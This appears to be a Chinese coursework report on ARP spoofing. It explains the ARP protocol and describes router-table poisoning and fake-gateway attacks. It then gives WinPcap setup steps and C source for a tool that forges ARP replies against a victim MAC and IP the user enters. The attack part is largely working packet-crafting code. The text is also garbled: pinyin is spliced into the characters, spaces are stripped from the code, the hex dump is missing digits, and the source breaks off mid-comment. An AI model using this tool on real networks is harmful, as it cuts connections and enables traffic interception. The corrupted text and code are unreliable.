C語(yǔ)言實(shí)現(xiàn)ARP攻擊(附源碼)

信息安全原理——ARP攻擊班級(jí)：07計(jì)算機(jī)1班姓名：胡益銘學(xué)號(hào)：E07620112ARP原理：ARP，即地址解析協(xié)議，實(shí)現(xiàn)通過(guò)IP地址得知其物理地址。在TCP/IP網(wǎng)絡(luò)環(huán)境下，每個(gè)主機(jī)都分配了一個(gè)32位的IP地址，這種互聯(lián)網(wǎng)地址是在網(wǎng)際范圍標(biāo)識(shí)主機(jī)的一種邏輯地址。為了讓報(bào)文在物理網(wǎng)路上傳送，必須知道對(duì)方目的主機(jī)的物理地址。這樣就存在把IP地址變換成物理地址的地址轉(zhuǎn)換問(wèn)題。以以太網(wǎng)環(huán)境為例，為了正確地向目的主機(jī)傳送報(bào)文，必須把目的主機(jī)的32位IP地址轉(zhuǎn)換成為48位以太網(wǎng)的地址。這就需要在互連層有一組服務(wù)將IP地址轉(zhuǎn)換為相應(yīng)物理地址，這組協(xié)議就是ARP協(xié)議。ARP數(shù)據(jù)報(bào)格式如下：什么是ARP欺騙：其實(shí)，此起彼伏的瞬間掉線或大面積的斷網(wǎng)大都是ARP欺騙在作怪。ARP欺騙攻擊已經(jīng)成了破壞網(wǎng)吧經(jīng)營(yíng)的罪魁禍?zhǔn)?，是網(wǎng)吧老板和網(wǎng)管員的心腹大患。從影響網(wǎng)絡(luò)連接通暢的方式來(lái)看，ARP欺騙分為二種，一種是對(duì)路由器ARP表的欺騙；另一種是對(duì)內(nèi)網(wǎng)PC的網(wǎng)關(guān)欺騙。第一種ARP欺騙的原理是——截獲網(wǎng)關(guān)數(shù)據(jù)。它通知路由器一系列錯(cuò)誤的內(nèi)網(wǎng)MAC地址，并按照一定的頻率不斷進(jìn)行，使真實(shí)的地址信息無(wú)法通過(guò)更新保存在路由器中，結(jié)果路由器的所有數(shù)據(jù)只能發(fā)送給錯(cuò)誤的MAC地址，造成正常PC無(wú)法收到信息。第二種ARP欺騙的原理是——偽造網(wǎng)關(guān)。它的原理是建立假網(wǎng)關(guān)，讓被它欺騙的PC向假網(wǎng)關(guān)發(fā)數(shù)據(jù)，而不是通過(guò)正常的路由器途徑上網(wǎng)。在PC看來(lái)，就是上不了網(wǎng)了，“網(wǎng)絡(luò)掉線了”。本程序基于C語(yǔ)言，利用winpacp實(shí)現(xiàn)往局域網(wǎng)內(nèi)發(fā)自定義的包，以達(dá)到ARP欺騙的目的。首先從/archive/下載4.0beta1-WpdPack和4.0beta1-WinPcap.exe，版本很多，不過(guò)最新版本需要64位的系統(tǒng)，本人32位系統(tǒng)用不了。直接點(diǎn)擊4.0beta1-WinPcap.exe安裝，然后在C:\ProgramFiles\WinPcap下打開(kāi)rpcapd.exe服務(wù)。然后在VC中，Tools→Options→Directories下配置include和library，將4.0beta1-WpdPack中的include和library庫(kù)包含進(jìn)去，本人把4.0beta1-WpdPack放在D盤(pán)根目錄下，結(jié)果如下：然后在Project→Settings→Link→Object/libraryModules，在文本框的末尾添加“wpcap.libpacket.libws2_32.lib”。編譯運(yùn)行后按提示輸入，內(nèi)容如下：1.\Device\NPF_GenericDialupAdapter(AdapterforgenericdialupandVPNcapture)2.\Device\NPF_{2A933761-706B-40E1-833D-7209ED0C0467}(WAN(PPP/SLIP)Interface)3.\Device\NPF_{547462F5-42E8-4FFB-85F9-54DA60C68BFD}(BroadcomNetXtremeGigabitEthernetDriver(Microsoft'sPacketScheduler))2是二次撥號(hào)的端口，3是本地連接，1不知道是什么，沒(méi)看懂。這里選擇3輸入的接收方MAC地址00:1C:23:2D:65:44是我自己的MAC地址，學(xué)校寢室的安全貌似做的很好，輸入別人的MAC地址出不來(lái)東西。目標(biāo)IP地址也是我自己的IP此時(shí)生成的包如下：01c232d654401bfcc21bb6860180640201bfcc21bb6a9be1601c232d6544a9be16000000000000000000解釋如下：以太網(wǎng)首部：01c232d6544//以太網(wǎng)目的地址，手動(dòng)輸入01bfcc21bb6//以太網(wǎng)源地址，假的，固定ARP幀：86//幀類型，0806表示ARP協(xié)議01//硬件類型，0001以太網(wǎng)80//協(xié)議類型，0800IP協(xié)議6//硬件地址長(zhǎng)度4//協(xié)議地址長(zhǎng)度02//op，01表示請(qǐng)求，02表示回復(fù)01bfcc21bb6//發(fā)送端以太網(wǎng)地址，同首部中以太網(wǎng)源地址a9be16//發(fā)送端IP地址，假的，固定01c232d6544//目的以太網(wǎng)地址，同首部中目的地址a9be16//目的IP地址，手動(dòng)輸入填充：000000000000000000此時(shí)電腦右下角就會(huì)出現(xiàn)如下圖的提示，IP地址沖突。附main.cpp代碼如下：#include<stdlib.h>#include<stdio.h>#include<pcap.h>intmain(){pcap_if_t*alldevs;//定義一個(gè)網(wǎng)絡(luò)接口的一個(gè)節(jié)點(diǎn)pcap_if_t*d;inti=0,inum=0,j;charerrbuf[PCAP_ERRBUF_SIZE];u_charpacket[60];pcap_t*adhandle;/*獲得設(shè)備列表*/if(pcap_findalldevs(&alldevs,errbuf)==-1){fprintf(stderr,"Errorinpcap_findalldevs:%s\n",errbuf);exit(1);}/*打印列表*/for(d=alldevs;d!=NULL;d=d->next){printf("%d.%s",++i,d->name);if(d->description)printf("(%s)\n",d->description);elseprintf("(Nodescriptionavailable)\n");}if(i==0){printf("\nNointerfacesfound!MakesureWinPcapisinstalled.\n");return0;}printf("Entertheinterfacenumber(1-%d):",i);scanf("%d",&inum);/*跳轉(zhuǎn)到選中的適配器*/for(d=alldevs,i=0;i<inum-1;d=d->next,i++);/*打開(kāi)適配器*/if((adhandle=pcap_open_live(d->name,//設(shè)備名65536,//要捕捉的數(shù)據(jù)包的部分//65535保證能捕獲到不同數(shù)據(jù)鏈路層上的每個(gè)數(shù)據(jù)包的全部?jī)?nèi)容1,//混雜模式1000,//讀取超時(shí)時(shí)間errbuf//錯(cuò)誤緩沖池))==NULL){fprintf(stderr,"\nUnabletoopentheadapter.%sisnotsupportedbyWinPcap\n",d->name);/*釋放設(shè)備列表*/pcap_freealldevs(alldevs);return-1;}printf("輸入被攻擊方的MAC地址（如FF-FF-FF-FF-FF-FF則為廣播）\n");scanf("%2x-%2x-%2x-%2x-%2x-%2x",&packet[0],&packet[1],&packet[2],&packet[3],&packet[4],&packet[5]);/*以太網(wǎng)目的地址*//*以太網(wǎng)源地址，當(dāng)然是假的*/packet[6]=0x0e;packet[7]=0x07;packet[8]=0X62;packet[9]=0x00;packet[10]=0X01;packet[11]=0x12;/*幀類型，0806表示ARP協(xié)議*/packet[12]=0x08;packet[13]=0x06;/*硬件類型，0001以太網(wǎng)*/packet[14]=0x00;packet[15]=0x01;/*協(xié)議類型，0800IP協(xié)議*/packet[16]=0x08;packet[17]=0x00;/*硬件地址長(zhǎng)度*/packet[18]=0x06;/*協(xié)議地址長(zhǎng)度*/packet[19]=0x04;/*op，01表示請(qǐng)求，02表示回復(fù)*/packet[20]=0x00;packet[21]=0x02;/*發(fā)送端以太網(wǎng)地址，同首部中以太網(wǎng)源地址*/for(i=22;i<28;i++){packet[i]=packet[i-16];}/*發(fā)送端IP地址*/printf("輸入要假冒的ip地址\n");scanf("%d.%d.%d.%d",&packet[28],&packet[29],&packet[30],&packet[31]);/*目的以太網(wǎng)地址，同首部中目的地址*/for(i=32;i<38;i++){packet[i]=packet[i-32];}/*目的IP地址，手動(dòng)輸入*/printf("輸入被攻擊方的ip地址\n");scanf("%d.%d.%d.%d",&packet[38],&packet[39],&packet[40],&packet[41]);/*填充數(shù)據(jù)*/for(j=42;j<60;j++){packet[j]=0x00;}/*在屏幕上輸出數(shù)據(jù)報(bào)